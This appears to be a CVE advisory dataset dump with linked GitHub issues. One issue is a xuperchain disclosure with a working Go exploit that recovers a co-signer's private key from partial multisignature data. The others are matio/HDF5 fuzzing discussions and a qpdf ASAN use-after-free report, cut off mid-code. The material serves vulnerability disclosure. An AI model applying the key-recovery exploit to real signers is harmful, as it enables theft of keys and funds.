[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:baidu:xuperchain:3.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "00609218-7F82-47ED-9173-3A8B9E5F3AB9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "312" ]
312
https://github.com/xuperchain/xuperchain/issues/782
[ "Exploit", "Third Party Advisory" ]
github.com
[ "xuperchain", "xuperchain" ]
**Brief of the issue** One can recover other's private key after collecting other's partial signature in multisignature . **logic** ``` group generator:G public key:PK={pk1,pk2} random k:Klist={k1,k2} commitment: R={k1*G,k2*G} partial signature:{s1=k1+sk1*H(PK,R,m),s2=k2+sk2*H(PK,R,m)} multi-signature:{s=s1+s2} ``` The one who proposal a multisignature knows PK,Klist,R,m.Once he get a partial signature(eg. s2), he can recover corresponding sk2 using "sk2=(s2-k2)/H(PK,R,m)". **Repo steps** 1.create contract account ``` { "module_name": "xkernel", "method_name": "NewAccount", "args" : { "account_name": "1111111111111112", "acl": "{\"pm\": {\"rule\": 1,\"acceptValue\": 0.6},\"aksWeight\": {\"cpfK8VvYM2HD3LxVKtTX4gSWhd5yY9Uc9\": 0.3,\"dpzuVdosQrF2kmzumhVeFQZa1aYcdgFpN\": 0.3}}" } } ``` private keys ``` {"Curvname":"P-256","X":74695617477160058757747208220371236837474210247114418775262229497812962582435,"Y":51348715319124770392993866417088542497927816017012182211244120852620959209571,"D":29079635126530934056640915735344231956621504557963207107451663058887647996601} {"Curvname":"P-256","X":91787036391293003172695413657884067915191938520396170158173185914172553761741,"Y":40739835763346591028878571144198809838511328964227878554494397715524768268672,"D":93588153837841202164112054414845840027182109058257269644248784691991231442233} ``` 2.generate multisignature transaction ``` $./xchain-cli multisig check tx.out { "txid": "", "blockid": "", "txInputs": [ { "refTxid": "43e08121b0fc494ec9293fc5bea14e04e25f238c21ef300d97066d71ad9d658f", "refOffset": 0, "fromAddr": "XC1111111111111112@xuper", "amount": "100" } ], "txOutputs": [ { "amount": "10", "toAddr": "STBkRsr1jPRyDtjJsGtBhPSV8bHLF1iea" }, { "amount": "90", "toAddr": "XC1111111111111112@xuper" } ], "desc": "Maybe common transfer transaction", "nonce": "158622433219727887", "timestamp": 1586224332186749730, "version": 1, "autogen": false, "coinbase": false, "txInputsExt": null, "txOutputsExt": null, "contractRequests": null, "initiator": "XC1111111111111112@xuper", "authRequire": [ "cpfK8VvYM2HD3LxVKtTX4gSWhd5yY9Uc9", "dpzuVdosQrF2kmzumhVeFQZa1aYcdgFpN" ], "initiatorSigns": null, "authRequireSigns": null, "receivedTimestamp": 0, "modifyBlock": { "marked": false, "effectiveHeight": 0, "effectiveTxid": "" } } ``` ``` $cat tx.out.ext {"R":"BHCQ0nV16u2RzFvJRwJwdbpynwE/B2vdkcNLIFFUNra1v1glh5AD0pPQv7ZXdYrB+ogJ8Nab/oJkbcFdGh3ffDc=","C":"BLn+hGjYn1ez/edycsDMil3nkCljCalkTZ9p99x/iMcD9dDb37qFia5xNaUq1zx+W8QkEk3YgrXKtV12K+c1R2Y=","KList":["Zk3I0ShYMYvfdRpVj5RrHOvzWq4FKzkiWv6j/dMne5s=","kJ2pmIdlWU3PiIxx/C7hVeAIFfpumocmBR7dVCIsMbk="],"PubKeys":["eyJDdXJ2bmFtZSI6IlAtMjU2IiwiWCI6OTE3ODcwMzYzOTEyOTMwMDMxNzI2OTU0MTM2NTc4ODQwNjc5MTUxOTE5Mzg1MjAzOTYxNzAxNTgxNzMxODU5MTQxNzI1NTM3NjE3NDEsIlkiOjQwNzM5ODM1NzYzMzQ2NTkxMDI4ODc4NTcxMTQ0MTk4ODA5ODM4NTExMzI4OTY0MjI3ODc4NTU0NDk0Mzk3NzE1NTI0NzY4MjY4NjcyfQ==","eyJDdXJ2bmFtZSI6IlAtMjU2IiwiWCI6NzQ2OTU2MTc0NzcxNjAwNTg3NTc3NDcyMDgyMjAzNzEyMzY4Mzc0NzQyMTAyNDcxMTQ0MTg3NzUyNjIyMjk0OTc4MTI5NjI1ODI0MzUsIlkiOjUxMzQ4NzE1MzE5MTI0NzcwMzkyOTkzODY2NDE3MDg4NTQyNDk3OTI3ODE2MDE3MDEyMTgyMjExMjQ0MTIwODUyNjIwOTU5MjA5NTcxfQ=="]} ``` 3.collect partial siganture ``` $./xchain-cli sign --tx tx.out --keys data/keys/ --sigtype multi {"Si":"JlxiNu7kN4HVHGlkzkRWXLaeFbYmVMEiBwBIF2ax5PYxedkYvJO2bXXavz43T2tWUCyxS+c0fZDeuT6U5nbkVA==","Index":1} ``` 4.caculate hash of transactions ```go package main import ( "io/ioutil" "github.com/golang/protobuf/proto" "github.com/xuperchain/xuperchain/core/pb" "github.com/xuperchain/xuperchain/core/utxo/txhash" ) func main(){ data, _ := ioutil.ReadFile("tx.out") tx := &pb.Transaction{} proto.Unmarshal(data, tx) digestHash, _ := txhash.MakeTxDigestHash(tx) ioutil.WriteFile("txhash",digestHash,0755) } ``` 5.recover private key ```go //exploit.go package main import ( "bytes" "fmt" "encoding/json" "crypto/sha256" "io/ioutil" "math/big" "crypto/ecdsa" ) type PartialSign struct { Si []byte Index int } type MultisigData struct { R []byte // common random value C []byte // common public key KList [][]byte // random value list PubKeys [][]byte // all public keys } // UsingSha256 get the hash result of data using SHA256 func UsingSha256(data []byte) []byte { h := sha256.New() h.Write(data) out := h.Sum(nil) return out } func BytesCombine(pBytes ...[]byte) []byte { var buffer bytes.Buffer for i := 0; i < len(pBytes); i++ { buffer.Write(pBytes[i]) } return buffer.Bytes() } func GetSiUsingKCRM(key *ecdsa.PrivateKey, k []byte, c []byte, r []byte, message []byte) []byte { hashBytes := UsingSha256(BytesCombine(c, r, message)) tmpResult := new(big.Int).Mul(new(big.Int).SetBytes(hashBytes), key.D) s := new(big.Int).Add(new(big.Int).SetBytes(k), tmpResult) return s.Bytes() } func main(){ data,_:=ioutil.ReadFile("./tx.out.ext") msd := &MultisigData{} json.Unmarshal(data,msd) //ioutil.WriteFile("exploit.out",msd.R,0755) // "m" txhash,_:=ioutil.ReadFile("./txhash") // "e = hash(P,R,m)" e := UsingSha256(BytesCombine(msd.C,msd.R,txhash)) // read k1 k1 := msd.KList[1] // read s1 signData,_:=ioutil.ReadFile("./main.sign") parsign := &PartialSign{} json.Unmarshal(signData,parsign) // calculate private key sk=(s1-k1)/e tmpResult := new(big.Int).Sub(new(big.Int).SetBytes(parsign.Si), new(big.Int).SetBytes(k1)) sk := new(big.Int).Div(tmpResult,new(big.Int).SetBytes(e)) fmt.Println(sk) } ``` run exploit.go ``` $go run exploit.go 29079635126530934056640915735344231956621504557963207107451663058887647996601 $cat data/keys/private.key {"Curvname":"P-256", "X":74695617477160058757747208220371236837474210247114418775262229497812962582435, "Y":51348715319124770392993866417088542497927816017012182211244120852620959209571, "D":29079635126530934056640915735344231956621504557963207107451663058887647996601} ``` **Additional information** I think no one-round-multisignature is proven security based schnorr signature.Change to BLS signature or just use plain multi-signature.
one can recover other's private key using multi-signature
https://api.github.com/repos/xuperchain/xuperchain/issues/782/comments
4
2020-04-07T05:11:12Z
2020-05-08T11:20:11Z
https://github.com/xuperchain/xuperchain/issues/782
595,595,276
782
2,205
CVE-2021-36977
2021-07-20T07:15:07.993
matio (aka MAT File I/O Library) 1.5.20 and 1.5.21 has a heap-based buffer overflow in H5MM_memcpy (called from H5MM_malloc and H5C_load_entry), related to use of HDF5 1.12.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31265" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/272" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/matio/OSV-2021-440.yaml" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/commit/37b781ace1b4228fc36483bb7e30c72ea9d4c3d6" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz/issues/4999" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31265" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/272" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/matio/OSV-2021-440.yaml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/commit/37b781ace1b4228fc36483bb7e30c72ea9d4c3d6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz/issues/4999" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:matio_project:matio:1.5.20:*:*:*:*:*:*:*", "matchCriteriaId": "DEDB03D0-7256-4959-87A0-F70E4F31B4E1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:matio_project:matio:1.5.21:*:*:*:*:*:*:*", "matchCriteriaId": "F3043489-5F78-451E-9E42-3F9E707D2D61", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/HDFGroup/hdf5/issues/272
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "HDFGroup", "hdf5" ]
OSS library [matio](https://github.com/tbeu/matio) is being continuously fuzzed by the [oss-fuzz](https://github.com/google/oss-fuzz) service. Most of the [open matio fuzzing issues](https://bugs.chromium.org/p/oss-fuzz/issues/list?q=matio&can=2&sort=-id&mode=grid&x=Engine&y=Type) seem to be related to the hdf5 v1.12.0 library dependency which is is not being fuzzed by oss-fuzz. Whom can I add as contact person for these issues? I believe the mail address needs to be setup as Google account in order to get access? See also https://github.com/google/oss-fuzz/issues/4999 where I first raised this topic. FYI @inferno-chromium
Delegating open fuzzing issues of libmatio to hdf5
https://api.github.com/repos/HDFGroup/hdf5/issues/272/comments
2
2021-01-19T20:42:49Z
2025-05-12T19:44:36Z
https://github.com/HDFGroup/hdf5/issues/272
789,351,146
272
2,206
CVE-2021-36977
2021-07-20T07:15:07.993
matio (aka MAT File I/O Library) 1.5.20 and 1.5.21 has a heap-based buffer overflow in H5MM_memcpy (called from H5MM_malloc and H5C_load_entry), related to use of HDF5 1.12.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31265" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/272" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/matio/OSV-2021-440.yaml" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/commit/37b781ace1b4228fc36483bb7e30c72ea9d4c3d6" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz/issues/4999" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31265" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/HDFGroup/hdf5/issues/272" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/matio/OSV-2021-440.yaml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/commit/37b781ace1b4228fc36483bb7e30c72ea9d4c3d6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz/issues/4999" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:matio_project:matio:1.5.20:*:*:*:*:*:*:*", "matchCriteriaId": "DEDB03D0-7256-4959-87A0-F70E4F31B4E1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:matio_project:matio:1.5.21:*:*:*:*:*:*:*", "matchCriteriaId": "F3043489-5F78-451E-9E42-3F9E707D2D61", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/google/oss-fuzz/issues/4999
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "google", "oss-fuzz" ]
Most of the [open matio fuzzing issues](https://bugs.chromium.org/p/oss-fuzz/issues/list?q=matio&can=2&sort=-id&mode=grid&x=Engine&y=Type) seem to be related to the hdf5 v1.12.0 library dependency which is is not being fuzzed by oss-fuzz. What can I do to get these open issues properly addressed. Can I reassign them to the [HDF5 developers](https://github.com/orgs/HDFGroup/people)? Can we add secondary contact to the project.yaml?
What to do if issue is raised in dependent library?
https://api.github.com/repos/google/oss-fuzz/issues/4999/comments
1
2021-01-18T20:18:24Z
2021-01-18T21:14:29Z
https://github.com/google/oss-fuzz/issues/4999
788,524,427
4,999
2,207
CVE-2021-36978
2021-07-20T07:15:08.030
QPDF 9.x through 9.1.1 and 10.x through 10.0.4 has a heap-based buffer overflow in Pl_ASCII85Decoder::write (called from Pl_AES_PDF::flush and Pl_AES_PDF::finish) when a certain downstream write fails.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=28262" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/qpdf/OSV-2020-2245.yaml" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/qpdf/qpdf/commit/dc92574c10f3e2516ec6445b88c5d584f40df4e5" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/qpdf/qpdf/issues/492" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00037.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202401-20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=28262" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/qpdf/OSV-2020-2245.yaml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/qpdf/qpdf/commit/dc92574c10f3e2516ec6445b88c5d584f40df4e5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/qpdf/qpdf/issues/492" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00037.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202401-20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:qpdf_project:qpdf:*:*:*:*:*:*:*:*", "matchCriteriaId": "1B05CAAF-503E-44C4-9C05-9B67FB428602", "versionEndExcluding": null, "versionEndIncluding": "9.1.1", "versionStartExcluding": null, "versionStartIncluding": "9.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:qpdf_project:qpdf:*:*:*:*:*:*:*:*", "matchCriteriaId": "D3248C5B-FA31-4C64-8E9B-1FD144777CD8", "versionEndExcluding": null, "versionEndIncluding": "10.0.4", "versionStartExcluding": null, "versionStartIncluding": "10.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/qpdf/qpdf/issues/492
null
github.com
[ "qpdf", "qpdf" ]
- version: 10.0.4 - commit: 78b9d6bfd4cbd3e947b1c5ffe73eb97b040e312a - How to reproduce: qpdf_afl_fuzzer ./poc The log from ASAN: ``` ==28751==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000076c5 at pc 0x0000008799bc bp 0x7fffffff6a30 sp 0x7fffffff6a28 WRITE of size 1 at 0x6070000076c5 thread T0 #0 0x8799bb in Pl_ASCII85Decoder::write(unsigned char*, unsigned long) /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:85:32 #1 0x877725 in Pl_AES_PDF::flush(bool) /src/qpdf/libqpdf/Pl_AES_PDF.cc:241:16 #2 0x877c75 in Pl_AES_PDF::finish() /src/qpdf/libqpdf/Pl_AES_PDF.cc #3 0x5996ab in QPDF::pipeStreamData(PointerHolder<QPDF::EncryptionParameters>, PointerHolder<InputSource>, QPDF&, int, int, long long, unsigned long, QPDFObjectHandle, bool, Pipeline*, bool, bool) /src/qpdf/libqpdf/QPDF.cc:2899:23 #4 0x599c9d in QPDF::pipeStreamData(int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/libqpdf/QPDF.cc:2920:12 #5 0x77e4c7 in QPDF::Pipe::pipeStreamData(QPDF*, int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/include/qpdf/QPDF.hh:718:19 #6 0x76e02e in QPDF_Stream::pipeStreamData(Pipeline*, bool*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDF_Stream.cc:700:8 #7 0x637e27 in QPDFObjectHandle::pipeStreamData(Pipeline*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDFObjectHandle.cc:1228:51 #8 0x700fbf in QPDFWriter::unparseObject(QPDFObjectHandle, int, int, unsigned long, bool) /src/qpdf/libqpdf/QPDFWriter.cc:1826:24 #9 0x71f286 in QPDFWriter::writeObject(QPDFObjectHandle, int) /src/qpdf/libqpdf/QPDFWriter.cc:2169:2 #10 0x737528 in QPDFWriter::writeStandard() /src/qpdf/libqpdf/QPDFWriter.cc:3676:2 #11 0x72aae7 in QPDFWriter::write() /src/qpdf/libqpdf/QPDFWriter.cc:2745:2 #12 0x51bb07 in FuzzHelper::doWrite(PointerHolder<QPDFWriter>) /src/qpdf_afl_fuzzer.cc:68:12 #13 0x51cb03 in FuzzHelper::testWrite() /src/qpdf_afl_fuzzer.cc:92:5 #14 0x5219a6 in FuzzHelper::doChecks() /src/qpdf_afl_fuzzer.cc:194:5 #15 0x5219a6 in FuzzHelper::run() /src/qpdf_afl_fuzzer.cc:210 #16 0x5221b7 in main /src/qpdf_afl_fuzzer.cc:228:7 #17 0x7ffff6a99bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #18 0x41eb89 in _start (/src/qpdf_afl_fuzzer+0x41eb89) 0x6070000076c5 is located 21 bytes inside of 78-byte region [0x6070000076b0,0x6070000076fe) freed by thread T0 here: #0 0x517d68 in operator delete(void*) (/src/qpdf_afl_fuzzer+0x517d68) #1 0x7ffff7af21a9 in std::runtime_error::~runtime_error() (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xa81a9) #2 0x599c9d in QPDF::pipeStreamData(int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/libqpdf/QPDF.cc:2920:12 #3 0x77e4c7 in QPDF::Pipe::pipeStreamData(QPDF*, int, int, long long, unsigned long, QPDFObjectHandle, Pipeline*, bool, bool) /src/qpdf/include/qpdf/QPDF.hh:718:19 #4 0x76e02e in QPDF_Stream::pipeStreamData(Pipeline*, bool*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDF_Stream.cc:700:8 #5 0x637e27 in QPDFObjectHandle::pipeStreamData(Pipeline*, int, qpdf_stream_decode_level_e, bool, bool) /src/qpdf/libqpdf/QPDFObjectHandle.cc:1228:51 #6 0x700fbf in QPDFWriter::unparseObject(QPDFObjectHandle, int, int, unsigned long, bool) /src/qpdf/libqpdf/QPDFWriter.cc:1826:24 #7 0x71f286 in QPDFWriter::writeObject(QPDFObjectHandle, int) /src/qpdf/libqpdf/QPDFWriter.cc:2169:2 #8 0x737528 in QPDFWriter::writeStandard() /src/qpdf/libqpdf/QPDFWriter.cc:3676:2 #9 0x72aae7 in QPDFWriter::write() /src/qpdf/libqpdf/QPDFWriter.cc:2745:2 #10 0x51bb07 in FuzzHelper::doWrite(PointerHolder<QPDFWriter>) /src/qpdf_afl_fuzzer.cc:68:12 #11 0x5219a6 in FuzzHelper::doChecks() /src/qpdf_afl_fuzzer.cc:194:5 #12 0x5219a6 in FuzzHelper::run() /src/qpdf_afl_fuzzer.cc:210 #13 0x7ffff6a99bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) previously allocated by thread T0 here: #0 0x516ff0 in operator new(unsigned long) (/src/qpdf_afl_fuzzer+0x516ff0) #1 0x7ffff7b1dc28 in std::string::_Rep::_S_create(unsigned long, unsigned long, std::allocator<char> const&) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd3c28) #2 0x883ce8 in Pl_Flate::handleData(unsigned char*, unsigned long, int) /src/qpdf/libqpdf/Pl_Flate.cc:197:12 #3 0x8833d5 in Pl_Flate::write(unsigned char*, unsigned long) /src/qpdf/libqpdf/Pl_Flate.cc:92:9 #4 0x87a0a7 in Pl_ASCII85Decoder::flush() /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:122:16 #5 0x87997b in Pl_ASCII85Decoder::write(unsigned char*, unsigned long) /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:88:4 #6 0x877725 in Pl_AES_PDF::flush(bool) /src/qpdf/libqpdf/Pl_AES_PDF.cc:241:16 SUMMARY: AddressSanitizer: heap-use-after-free /src/qpdf/libqpdf/Pl_ASCII85Decoder.cc:85:32 in Pl_ASCII85Decoder::write(unsigned char*, unsigned long) Shadow bytes around the buggy address: 0x0c0e7fff8e80: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0e7fff8e90: 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fd fd 0x0c0e7fff8ea0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0e7fff8eb0: fd fd fd fd fd fd fa fa fa fa 00 00 00 00 00 00 0x0c0e7fff8ec0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c0e7fff8ed0: 00 fa fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd 0x0c0e7fff8ee0: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa 0x0c0e7fff8ef0: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0e7fff8f00: 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fa fa 0x0c0e7fff8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==28751==ABORTING ``` The test program is a wrapper that I modified based on [oss-fuzz](https://github.com/qpdf/qpdf/blob/master/fuzz/qpdf_fuzzer.cc) wrapper: ```c // file name is qpdf_afl_fuzzer.c #include <qpdf/QPDF.hh> #include <qpdf/QPDFWriter.hh> #include <qpdf/QUtil.hh> #include <qpdf/BufferInputSource.hh> #include <qpdf/Buffer.hh> #include <qpdf/Pl_Discard.hh> #include <qpdf/QPDFPageDocumentHelper.hh> #include <qpdf/QPDFPageObjectHelper.hh> #include <qpdf/QPDFPageLabelDocumentHelper.hh> #include <qpdf/QPDFOutlineDocumentHelper.hh> #include <qpdf/QPDFAcroFormDocumentHelper.hh> #include <cstdlib> class DiscardContents: public QPDFObjectHandle::ParserCallbacks { public: virtual ~DiscardContents() {} virtual void handleObject(QPDFObjectHandle) {} virtual void handleEOF() {} }; class FuzzHelper { public: FuzzHelper(char* data); void run(); private: PointerHolder<QPDF> getQpdf(); PointerHolder<QPDFWriter> getWriter(PointerHolder<QPDF>); void doWrite(PointerHolder<QPDFWriter> w); void testWrite(); void testPages(); void testOutlines(); void doChecks(); char const* input_f; Pl_Discard discard; }; FuzzHelper::FuzzHelper(char* _input) : // We do not modify data, so it is safe to remove the const for Buffer input_f(_input) { } PointerHolder<QPDF> FuzzHelper::getQpdf() { PointerHolder<QPDF> qpdf = new QPDF(); qpdf->processFile(input_f); return qpdf; } PointerHolder<QPDFWriter> FuzzHelper::getWriter(PointerHolder<QPDF> qpdf) { PointerHolder<QPDFWriter> w = new QPDFWriter(*qpdf); w->setOutputPipeline(&this->discard); w->setDecodeLevel(qpdf_dl_all); return w; } void FuzzHelper::doWrite(PointerHolder<QPDFWriter> w) { try { w->write(); } catch (QPDFExc const& e) { std::cerr << e.what() << std::endl; } catch 